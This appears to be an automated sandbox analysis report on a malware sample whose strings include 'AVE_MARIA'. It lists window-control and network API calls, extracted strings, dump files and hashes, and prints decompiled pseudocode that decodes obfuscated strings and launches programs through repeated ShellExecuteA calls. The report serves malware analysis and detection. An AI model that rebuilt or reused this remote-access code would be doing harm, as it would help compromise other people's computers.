WindowFromPoint.USER32(00000000,?), ref: 00B45D82
SendMessageA.USER32 ref: 00B45DAF
PostMessageA.USER32(00000000,00000112,0000F020,00000000), ref: 00B45DCA
ScreenToClient.USER32 ref: 00B45DDA
GetWindowPlacement.USER32(00000000,?), ref: 00B45DFC
GetWindowLongA.USER32 ref: 00B45E28
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00B45E37
SendMessageA.USER32 ref: 00B45E48
FindWindowA.USER32(?,00000000), ref: 00B45E94
GetWindowRect.USER32 ref: 00B45EA2
PtInRect.USER32(?,?,?), ref: 00B45EB5
PostMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00B45EC9
recv.WS2_32(?,00000200,00000004,00000000), ref: 00B45EE3
TerminateThread.KERNEL32(00000000), ref: 00B45EF6
RealGetWindowClassA.USER32(00000000,?,00000104), ref: 00B45F37
lstrcmpA.KERNEL32(?,crpt), ref: 00B45F72
SendMessageA.USER32 ref: 00B45F8A
MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 00B45F9C
GetMenuItemID.USER32(00000000,00000000), ref: 00B45FA6
PostMessageA.USER32(00000000,000001E5,00000000,00000000), ref: 00B45FBB
PostMessageA.USER32(00000000,00000100,0000000D,00000000), ref: 00B45FC7
SendMessageA.USER32 ref: 00B45FFA
GetWindowRect.USER32 ref: 00B4601E
MoveWindow.USER32(?,?,00000004,00000000,00000004,00000000), ref: 00B460C9
ScreenToClient.USER32 ref: 00B460F8
ChildWindowFromPoint.USER32 ref: 00B46107
PostMessageA.USER32(00000000,?,?,?), ref: 00B4613D

Strings

++, xrefs: 00B45E72
,, xrefs: 00B45DF2
r}, xrefs: 00B45F47
AVE_MARIA, xrefs: 00B45BF0
crpt, xrefs: 00B45F60, 00B45F69

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Message$Postrecv$FromPointSendThread$Rectlstrcat$ClientCreateFolderItemLongMenuPathScreenValuesend$ChildClassDesktopDirectoryFindMoveOpenPlacementQueryRealStartupTerminateWindowsconnectgethostbynamehtonslstrcmpsocket
String ID: ++$,$AVE_MARIA$crpt$r}
API String ID: 3286681106-786296257
Opcode ID: 1b928f69498a00a7096ebde35387ba409772ee9602c4583048219f71e232a5cf
Instruction ID: 7bd856bc1f9f3534aab8fe10c13b104995754a2dcf3a9439685b0e49f69d15f3
Opcode Fuzzy Hash: 1b928f69498a00a7096ebde35387ba409772ee9602c4583048219f71e232a5cf
Instruction Fuzzy Hash: 05F19071548701AFD7219F24CD88E2BBBE8EB8A744F10095DF585A3291DBB4DA04EB63

Uniqueness

Uniqueness Score: -1.00%

Function 00B49CBF, Relevance: 35.5, APIs: 5, Strings: 15, Instructions: 467
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00B49CBF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				void _t149;
				void _t150;
				void _t153;
				void _t154;
				void _t157;
				void _t158;
				void _t161;
				void _t162;
				void _t165;
				void _t166;
				void* _t169;
				void _t170;
				void _t171;
				void* _t174;
				void _t175;
				void _t176;
				void* _t179;
				void _t180;
				void _t181;
				void* _t184;
				void _t185;
				void _t186;
				void* _t189;
				void _t190;
				void _t191;
				void _t194;
				void _t195;
				void* _t198;
				void _t199;
				void _t200;
				char* _t202;
				void* _t203;
				char* _t204;
				char* _t208;
				char* _t212;
				char* _t216;
				char* _t220;
				void* _t225;
				signed int _t226;
				char* _t228;
				char _t233;
				char _t235;
				char _t237;
				char _t239;
				char _t241;
				signed int _t243;
				signed int _t249;
				signed int _t255;
				signed int _t261;
				signed int _t267;
				signed int _t274;
				signed int _t281;
				signed int _t288;
				signed int _t295;
				signed int _t302;
				signed int _t308;
				signed int _t315;
				void* _t333;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t342;
				signed int _t343;
				void* _t344;
				signed int _t345;
				void* _t346;
				signed int _t347;
				void* _t348;
				signed int _t349;
				void* _t350;
				signed int _t351;
				void* _t352;
				signed int _t353;
				void* _t354;
				signed int _t355;
				void* _t356;
				signed int _t357;
				void* _t358;
				signed int _t359;
				void* _t360;
				signed int _t361;
				intOrPtr _t363;
				void* _t365;
				void* _t371;
				void* _t377;
				void* _t383;
				void* _t389;
				void* _t395;
				void* _t401;
				void* _t407;
				void* _t413;
				void* _t418;
				void* _t423;
				void* _t428;
				intOrPtr _t435;
				void* _t436;
				void* _t437;
				void* _t438;
				void* _t439;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t451;
				signed int _t452;
				signed int _t454;
				void* _t455;
				void* _t457;
				void* _t459;
				void* _t461;
				void* _t463;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t469;
				void* _t471;
				void* _t473;
				void* _t475;
				void* _t477;
				void* _t478;
				signed int _t479;

				_t134 =  *0xb69014; // 0x26ce9e99
				 *(_t454 + 0x70) = _t134 ^ _t454;
				_t225 =  *(_t454 + 0x7c);
				_push(0x104);
				_t136 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x18)) = _t136;
				_t363 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x28)) = _t363;
				_t138 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x24)) = _t138;
				_t139 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x2c)) = _t139;
				_t435 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x38)) = _t435;
				E00B509A2();
				_t455 = _t454 + 0x18;
				 *((intOrPtr*)(_t455 + 0x28)) = 0x31273235;
				_t9 = _t455 + 0x28; // 0x31273235
				 *((intOrPtr*)(_t455 + 0x2c)) = 0x222b242a;
				 *((char*)(_t455 + 0x30)) = 0;
				_t143 = E00B5187C(E00B49790(_t9));
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				_t451 = _t143;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t144 = E00B427DA(_t455 + 0x34);
				_t333 =  *((intOrPtr*)(_t455 + 0x10)) - _t144;
				do {
					_t233 =  *_t144;
					 *((char*)(_t144 + _t333)) = _t233;
					_t144 = _t144 + 1;
				} while (_t233 != 0);
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t145 = E00B427DA(_t455 + 0x34);
				_t335 = _t363 - _t145;
				do {
					_t235 =  *_t145;
					 *((char*)(_t145 + _t335)) = _t235;
					_t145 = _t145 + 1;
				} while (_t235 != 0);
				_t23 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t146 = E00B427DA(_t23);
				_t337 =  *((intOrPtr*)(_t455 + 0x14)) - _t146;
				do {
					_t237 =  *_t146;
					 *((char*)(_t146 + _t337)) = _t237;
					_t146 = _t146 + 1;
				} while (_t237 != 0);
				_t29 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t147 = E00B427DA(_t29);
				_t339 =  *((intOrPtr*)(_t455 + 0x18)) - _t147;
				do {
					_t239 =  *_t147;
					 *((char*)(_t147 + _t339)) = _t239;
					_t147 = _t147 + 1;
				} while (_t239 != 0);
				_t35 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t148 = E00B427DA(_t35);
				_t341 = _t435 - _t148;
				do {
					_t241 =  *_t148;
					 *((char*)(_t148 + _t341)) = _t241;
					_t148 = _t148 + 1;
				} while (_t241 != 0);
				_t342 = _t225;
				_t436 = _t225;
				do {
					_t149 =  *_t342;
					_t342 = _t342 + 1;
				} while (_t149 != 0);
				_t343 = _t342 - _t436;
				_t365 =  *((intOrPtr*)(_t455 + 0x10)) - 1;
				do {
					_t150 =  *(_t365 + 1);
					_t365 = _t365 + 1;
				} while (_t150 != 0);
				_t243 = _t343 >> 2;
				memcpy(_t365, _t436, _t243 << 2);
				_t344 = _t225;
				memcpy(_t436 + _t243 + _t243, _t436, _t343 & 0x00000003);
				_t457 = _t455 + 0x18;
				_t437 = _t344;
				do {
					_t153 =  *_t344;
					_t344 = _t344 + 1;
				} while (_t153 != 0);
				_t345 = _t344 - _t437;
				_t371 =  *((intOrPtr*)(_t457 + 0x1c)) - 1;
				do {
					_t154 =  *(_t371 + 1);
					_t371 = _t371 + 1;
				} while (_t154 != 0);
				_t249 = _t345 >> 2;
				memcpy(_t371, _t437, _t249 << 2);
				_t346 = _t225;
				memcpy(_t437 + _t249 + _t249, _t437, _t345 & 0x00000003);
				_t459 = _t457 + 0x18;
				_t438 = _t346;
				do {
					_t157 =  *_t346;
					_t346 = _t346 + 1;
				} while (_t157 != 0);
				_t347 = _t346 - _t438;
				_t377 =  *((intOrPtr*)(_t459 + 0x14)) - 1;
				do {
					_t158 =  *(_t377 + 1);
					_t377 = _t377 + 1;
				} while (_t158 != 0);
				_t255 = _t347 >> 2;
				memcpy(_t377, _t438, _t255 << 2);
				_t348 = _t225;
				memcpy(_t438 + _t255 + _t255, _t438, _t347 & 0x00000003);
				_t461 = _t459 + 0x18;
				_t439 = _t348;
				do {
					_t161 =  *_t348;
					_t348 = _t348 + 1;
				} while (_t161 != 0);
				_t349 = _t348 - _t439;
				_t383 =  *((intOrPtr*)(_t461 + 0x18)) - 1;
				do {
					_t162 =  *(_t383 + 1);
					_t383 = _t383 + 1;
				} while (_t162 != 0);
				_t261 = _t349 >> 2;
				memcpy(_t383, _t439, _t261 << 2);
				memcpy(_t439 + _t261 + _t261, _t439, _t349 & 0x00000003);
				_t463 = _t461 + 0x18;
				_t440 = _t225;
				do {
					_t165 =  *_t225;
					_t225 = _t225 + 1;
				} while (_t165 != 0);
				_t226 = _t225 - _t440;
				_t389 =  *((intOrPtr*)(_t463 + 0x20)) - 1;
				do {
					_t166 =  *(_t389 + 1);
					_t389 = _t389 + 1;
				} while (_t166 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t267 = _t226 >> 2;
				memcpy(_t389, _t440, _t267 << 2);
				_t464 = _t463 + 0xc;
				asm("movups [esp+0x34], xmm0");
				asm("movaps xmm0, [0xb3de90]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t464 + 0x74)) = 0xafc3d3ac;
				asm("movaps xmm0, [0xb3de50]");
				memcpy(_t440 + _t267 + _t267, _t440, _t226 & 0x00000003);
				_t465 = _t464 + 0xc;
				asm("movups [esp+0x54], xmm0");
				_t56 = _t465 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t465 + 0x78)) = 0xa5afc1d6;
				asm("movaps xmm0, [0xb3de20]");
				asm("movups [esp+0x64], xmm0");
				 *((char*)(_t465 + 0x7c)) = 0;
				_t169 = E00B4A2DD(_t56);
				_t350 = _t169;
				_t441 = _t169;
				do {
					_t170 =  *_t350;
					_t350 = _t350 + 1;
				} while (_t170 != 0);
				_t351 = _t350 - _t441;
				_t395 =  *((intOrPtr*)(_t465 + 0x10)) - 1;
				do {
					_t171 =  *(_t395 + 1);
					_t395 = _t395 + 1;
				} while (_t171 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t274 = _t351 >> 2;
				memcpy(_t395, _t441, _t274 << 2);
				memcpy(_t441 + _t274 + _t274, _t441, _t351 & 0x00000003);
				_t467 = _t465 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t62 = _t467 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t467 + 0x54)) = 0x26304d32;
				asm("movaps xmm0, [0xb3deb0]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t467 + 0x58)) = 0x26344925;
				 *((intOrPtr*)(_t467 + 0x5c)) = 0x422e3b44;
				 *((short*)(_t467 + 0x60)) = 0x4e;
				_t174 = E00B4A2F8(_t62);
				_t352 = _t174;
				_t442 = _t174;
				do {
					_t175 =  *_t352;
					_t352 = _t352 + 1;
				} while (_t175 != 0);
				_t353 = _t352 - _t442;
				_t401 =  *((intOrPtr*)(_t467 + 0x1c)) - 1;
				do {
					_t176 =  *(_t401 + 1);
					_t401 = _t401 + 1;
				} while (_t176 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t281 = _t353 >> 2;
				memcpy(_t401, _t442, _t281 << 2);
				memcpy(_t442 + _t281 + _t281, _t442, _t353 & 0x00000003);
				_t469 = _t467 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t70 = _t469 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t469 + 0x64)) = 0x5a36235c;
				asm("movaps xmm0, [0xb3dd00]");
				asm("movups [esp+0x44], xmm0");
				 *((short*)(_t469 + 0x68)) = 0x56;
				asm("movaps xmm0, [0xb3dd30]");
				asm("movups [esp+0x54], xmm0");
				_t179 = E00B4A2C2(_t70);
				_t354 = _t179;
				_t443 = _t179;
				do {
					_t180 =  *_t354;
					_t354 = _t354 + 1;
				} while (_t180 != 0);
				_t355 = _t354 - _t443;
				_t407 =  *((intOrPtr*)(_t469 + 0x14)) - 1;
				do {
					_t181 =  *(_t407 + 1);
					_t407 = _t407 + 1;
				} while (_t181 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t288 = _t355 >> 2;
				memcpy(_t407, _t443, _t288 << 2);
				memcpy(_t443 + _t288 + _t288, _t443, _t355 & 0x00000003);
				_t471 = _t469 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t76 = _t471 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t471 + 0x54)) = 0x2227334c;
				asm("movaps xmm0, [0xb3db20]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t471 + 0x58)) = 0x4b273748;
				 *((intOrPtr*)(_t471 + 0x5c)) = 0x49432d3a;
				 *((char*)(_t471 + 0x60)) = 0;
				_t184 = E00B4A2A7(_t76);
				_t356 = _t184;
				_t444 = _t184;
				do {
					_t185 =  *_t356;
					_t356 = _t356 + 1;
				} while (_t185 != 0);
				_t357 = _t356 - _t444;
				_t413 =  *((intOrPtr*)(_t471 + 0x18)) - 1;
				do {
					_t186 =  *(_t413 + 1);
					_t413 = _t413 + 1;
				} while (_t186 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t295 = _t357 >> 2;
				memcpy(_t413, _t444, _t295 << 2);
				memcpy(_t444 + _t295 + _t295, _t444, _t357 & 0x00000003);
				_t473 = _t471 + 0x18;
				_t84 = _t473 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t473 + 0x44)) = 0x36367e70;
				asm("movups [esp+0x34], xmm0");
				 *((intOrPtr*)(_t473 + 0x48)) = 0x75762c3a;
				 *((char*)(_t473 + 0x4c)) = 0;
				_t189 = E00B42CF5(_t84);
				_t358 = _t189;
				_t445 = _t189;
				do {
					_t190 =  *_t358;
					_t358 = _t358 + 1;
				} while (_t190 != 0);
				_t228 =  *(_t473 + 0x20);
				_t359 = _t358 - _t445;
				_t418 = _t228 - 1;
				do {
					_t191 =  *(_t418 + 1);
					_t418 = _t418 + 1;
				} while (_t191 != 0);
				_t302 = _t359 >> 2;
				memcpy(_t418, _t445, _t302 << 2);
				memcpy(_t445 + _t302 + _t302, _t445, _t359 & 0x00000003);
				_t475 = _t473 + 0x18;
				_t446 = _t451;
				do {
					_t194 =  *_t451;
					_t451 = _t451 + 1;
				} while (_t194 != 0);
				_t452 = _t451 - _t446;
				_t423 = _t228 - 1;
				do {
					_t195 =  *(_t423 + 1);
					_t423 = _t423 + 1;
				} while (_t195 != 0);
				asm("movaps xmm0, [0xb3dad0]");
				_t308 = _t452 >> 2;
				memcpy(_t423, _t446, _t308 << 2);
				memcpy(_t446 + _t308 + _t308, _t446, _t452 & 0x00000003);
				_t477 = _t475 + 0x18;
				_t95 = _t477 + 0x34; // 0x2a62226f
				asm("movups [esp+0x34], xmm0");
				_t198 = E00B42D2B(_t95);
				_t360 = _t198;
				_t447 = _t198;
				do {
					_t199 =  *_t360;
					_t360 = _t360 + 1;
				} while (_t199 != 0);
				_t361 = _t360 - _t447;
				_t428 = _t228 - 1;
				do {
					_t200 =  *(_t428 + 1);
					_t428 = _t428 + 1;
				} while (_t200 != 0);
				 *((intOrPtr*)(_t477 + 0x28)) = 0x6d262c23;
				_t315 = _t361 >> 2;
				_t202 = memcpy(_t428, _t447, _t315 << 2);
				_t478 = _t477 + 0xc;
				 *((intOrPtr*)(_t478 + 0x2c)) = 0x233d21;
				 *((intOrPtr*)(_t478 + 0x24)) = 0x2d27312f;
				_t203 = memcpy(_t447 + _t315 + _t315, _t447, _t361 & 0x00000003);
				_t479 = _t478 + 0xc;
				_t103 = _t479 + 0x34; // 0x2a62226f
				 *(_t479 + 0x30) = _t203;
				_t204 = E00B46346(_t103);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t204,  *(_t478 + 0x18), _t202, _t202);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				_t107 = _t479 + 0x24; // 0x2d27312f
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t208 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t208,  *_t107, 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t212 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t212,  *(_t479 + 0x1c), 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t216 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t216,  *(_t479 + 0x20), 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t220 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t220, _t228, 0, 0);
				return E00B4AE43( *(_t479 + 0x80) ^ _t479);
			}

0x00b49cc2
0x00b49cc9
0x00b49cce
0x00b49cda
0x00b49cdb
0x00b49ce0
0x00b49ce1
0x00b49cea
0x00b49cec
0x00b49ced
0x00b49cf1
0x00b49cf6
0x00b49cf7
0x00b49cfb
0x00b49d00
0x00b49d01
0x00b49d0a
0x00b49d0c
0x00b49d0d
0x00b49d11
0x00b49d16
0x00b49d19
0x00b49d21
0x00b49d25
0x00b49d2d
0x00b49d38
0x00b49d42
0x00b49d4a
0x00b49d4c
0x00b49d54
0x00b49d5c
0x00b49d65
0x00b49d67
0x00b49d67
0x00b49d69
0x00b49d6c
0x00b49d6d
0x00b49d75
0x00b49d7d
0x00b49d85
0x00b49d8d
0x00b49d94
0x00b49d96
0x00b49d96
0x00b49d98
0x00b49d9b
0x00b49d9c
0x00b49da0
0x00b49da4
0x00b49dac
0x00b49db4
0x00b49dbc
0x00b49dc5
0x00b49dc7
0x00b49dc7
0x00b49dc9
0x00b49dcc
0x00b49dcd
0x00b49dd1
0x00b49dd5
0x00b49ddd
0x00b49de5
0x00b49ded
0x00b49df6
0x00b49df8
0x00b49df8
0x00b49dfa
0x00b49dfd
0x00b49dfe
0x00b49e02
0x00b49e06
0x00b49e0e
0x00b49e16
0x00b49e1e
0x00b49e25
0x00b49e27
0x00b49e27
0x00b49e29
0x00b49e2c
0x00b49e2d
0x00b49e31
0x00b49e33
0x00b49e35
0x00b49e35
0x00b49e37
0x00b49e38
0x00b49e40
0x00b49e42
0x00b49e43
0x00b49e43
0x00b49e46
0x00b49e47
0x00b49e4d
0x00b49e50
0x00b49e54
0x00b49e59
0x00b49e59
0x00b49e5b
0x00b49e5d
0x00b49e5d
0x00b49e5f
0x00b49e60
0x00b49e68
0x00b49e6a
0x00b49e6b
0x00b49e6b
0x00b49e6e
0x00b49e6f
0x00b49e75
0x00b49e78
0x00b49e7c
0x00b49e81
0x00b49e81
0x00b49e83
0x00b49e85
0x00b49e85
0x00b49e87
0x00b49e88
0x00b49e90
0x00b49e92
0x00b49e93
0x00b49e93
0x00b49e96
0x00b49e97
0x00b49e9d
0x00b49ea0
0x00b49ea4
0x00b49ea9
0x00b49ea9
0x00b49eab
0x00b49ead
0x00b49ead
0x00b49eaf
0x00b49eb0
0x00b49eb8
0x00b49eba
0x00b49ebb
0x00b49ebb
0x00b49ebe
0x00b49ebf
0x00b49ec5
0x00b49ec8
0x00b49ecf
0x00b49ecf
0x00b49ed1
0x00b49ed3
0x00b49ed3
0x00b49ed5
0x00b49ed6
0x00b49ede
0x00b49ee0
0x00b49ee1
0x00b49ee1
0x00b49ee4
0x00b49ee5
0x00b49ee9
0x00b49ef2
0x00b49ef5
0x00b49ef5
0x00b49ef7
0x00b49f00
0x00b49f0a
0x00b49f0f
0x00b49f17
0x00b49f1e
0x00b49f1e
0x00b49f20
0x00b49f25
0x00b49f29
0x00b49f31
0x00b49f38
0x00b49f3d
0x00b49f41
0x00b49f46
0x00b49f48
0x00b49f4a
0x00b49f4a
0x00b49f4c
0x00b49f4d
0x00b49f55
0x00b49f57
0x00b49f58
0x00b49f58
0x00b49f5b
0x00b49f5c
0x00b49f60
0x00b49f69
0x00b49f6c
0x00b49f73
0x00b49f73
0x00b49f75
0x00b49f7a
0x00b49f7e
0x00b49f86
0x00b49f8d
0x00b49f92
0x00b49f9a
0x00b49fa2
0x00b49fa9
0x00b49fae
0x00b49fb0
0x00b49fb2
0x00b49fb2
0x00b49fb4
0x00b49fb5
0x00b49fbd
0x00b49fbf
0x00b49fc0
0x00b49fc0
0x00b49fc3
0x00b49fc4
0x00b49fc8
0x00b49fd1
0x00b49fd4
0x00b49fdb
0x00b49fdb
0x00b49fdd
0x00b49fe2
0x00b49fe6
0x00b49fee
0x00b49ff5
0x00b49ffa
0x00b4a001
0x00b4a008
0x00b4a00d
0x00b4a012
0x00b4a014
0x00b4a016
0x00b4a016
0x00b4a018
0x00b4a019
0x00b4a021
0x00b4a023
0x00b4a024
0x00b4a024
0x00b4a027
0x00b4a028
0x00b4a02c
0x00b4a035
0x00b4a038
0x00b4a03f
0x00b4a03f
0x00b4a041
0x00b4a046
0x00b4a04a
0x00b4a052
0x00b4a059
0x00b4a05e
0x00b4a066
0x00b4a06e
0x00b4a072
0x00b4a077
0x00b4a079
0x00b4a07b
0x00b4a07b
0x00b4a07d
0x00b4a07e
0x00b4a086
0x00b4a088
0x00b4a089
0x00b4a089
0x00b4a08c
0x00b4a08d
0x00b4a093
0x00b4a09a
0x00b4a09d
0x00b4a0a4
0x00b4a0a4
0x00b4a0a6
0x00b4a0aa
0x00b4a0b2
0x00b4a0b7
0x00b4a0bf
0x00b4a0c3
0x00b4a0c8
0x00b4a0ca
0x00b4a0cc
0x00b4a0cc
0x00b4a0ce
0x00b4a0cf
0x00b4a0d3
0x00b4a0d7
0x00b4a0d9
0x00b4a0dc
0x00b4a0dc
0x00b4a0df
0x00b4a0e0
0x00b4a0e6
0x00b4a0e9
0x00b4a0f0
0x00b4a0f0
0x00b4a0f2
0x00b4a0f4
0x00b4a0f4
0x00b4a0f7
0x00b4a0f8
0x00b4a0fc
0x00b4a0fe
0x00b4a101
0x00b4a101
0x00b4a104
0x00b4a105
0x00b4a109
0x00b4a112
0x00b4a115
0x00b4a11c
0x00b4a11c
0x00b4a11e
0x00b4a122
0x00b4a127
0x00b4a12c
0x00b4a12e
0x00b4a130
0x00b4a130
0x00b4a132
0x00b4a133
0x00b4a137
0x00b4a139
0x00b4a13c
0x00b4a13c
0x00b4a13f
0x00b4a140
0x00b4a146
0x00b4a14e
0x00b4a153
0x00b4a153
0x00b4a157
0x00b4a163
0x00b4a170
0x00b4a170
0x00b4a172
0x00b4a176
0x00b4a17a
0x00b4a18c
0x00b4a194
0x00b4a19e
0x00b4a1a6
0x00b4a1ae
0x00b4a1b6
0x00b4a1ba
0x00b4a1cc
0x00b4a1d4
0x00b4a1e6
0x00b4a1ee
0x00b4a1f6
0x00b4a1fa
0x00b4a20c
0x00b4a214
0x00b4a226
0x00b4a22e
0x00b4a236
0x00b4a23a
0x00b4a24c
0x00b4a254
0x00b4a263
0x00b4a26b
0x00b4a273
0x00b4a277
0x00b4a289
0x00b4a2a4

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A18C
ShellExecuteA.SHELL32(00000000,00000000,00000000,/1'-,00000000,00000000), ref: 00B4A1CC
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A20C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A24C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A289

Strings

52'1, xrefs: 00B49D21
/1'-, xrefs: 00B4A19E
:,vu, xrefs: 00B4A0B7
N, xrefs: 00B49FA2
V, xrefs: 00B49FFA
;ih, xrefs: 00B49E16
:-CI, xrefs: 00B4A066
p~66, xrefs: 00B4A0AA
o"b*, xrefs: 00B49DA0
!=#, xrefs: 00B4A263
L3'", xrefs: 00B4A04A
H7'K, xrefs: 00B4A05E
'$%+, xrefs: 00B49E0E
\#6Z, xrefs: 00B49FE6
/1'-, xrefs: 00B4A26B

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$'$%+$/1'-$/1'-$52'1$:,vu$:-CI$;ih$H7'K$L3'"$N$V$\#6Z$o"b*$p~66
API String ID: 587946157-1764487608
Opcode ID: fdb9f0b35945b9672c15160a09b62d7b24a0d304a33419ebf0b70b58785a7a07
Instruction ID: 71fd287016c26cd315b4cbc2874510c08d5545d827575ed635e6f3ac3a6e81a5
Opcode Fuzzy Hash: fdb9f0b35945b9672c15160a09b62d7b24a0d304a33419ebf0b70b58785a7a07
Instruction Fuzzy Hash: 590213605087859FCB16DF2895902ABFBE2FFD9700F449A8CF8C657211DF319A4ADB12

Uniqueness

Uniqueness Score: -1.00%

Function 00B499C5, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00B499C5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t55;
				intOrPtr _t57;
				char _t60;
				void _t61;
				void _t62;
				void _t66;
				void _t67;
				void _t70;
				void _t71;
				void* _t73;
				void _t75;
				void _t76;
				int _t78;
				char* _t79;
				char* _t80;
				void* _t85;
				signed int _t86;
				char* _t87;
				void* _t90;
				intOrPtr* _t91;
				signed int _t93;
				void* _t98;
				signed int _t100;
				signed int _t106;
				void* _t111;
				signed int _t113;
				void* _t123;
				void* _t124;
				signed int _t125;
				void* _t126;
				signed int _t127;
				intOrPtr _t129;
				void* _t130;
				void* _t135;
				void* _t140;
				void* _t145;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t158;
				signed int _t159;
				signed int _t161;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t55 =  *0xb69014; // 0x26ce9e99
				 *(_t161 + 0x3c) = _t55 ^ _t161;
				_t85 =  *(_t161 + 0x4c);
				_t158 =  *(_t161 + 0x4c);
				_push(0x208);
				_t57 = E00B509A2();
				asm("movaps xmm0, [0xb3dcd0]");
				_t129 = _t57;
				 *((intOrPtr*)(_t161 + 0x18)) = _t129;
				_t90 = 0;
				asm("movups [esp+0x20], xmm0");
				 *((intOrPtr*)(_t161 + 0x30)) = 0x73372531;
				 *((intOrPtr*)(_t161 + 0x34)) = 0x7738217b;
				 *((char*)(_t161 + 0x38)) = 0;
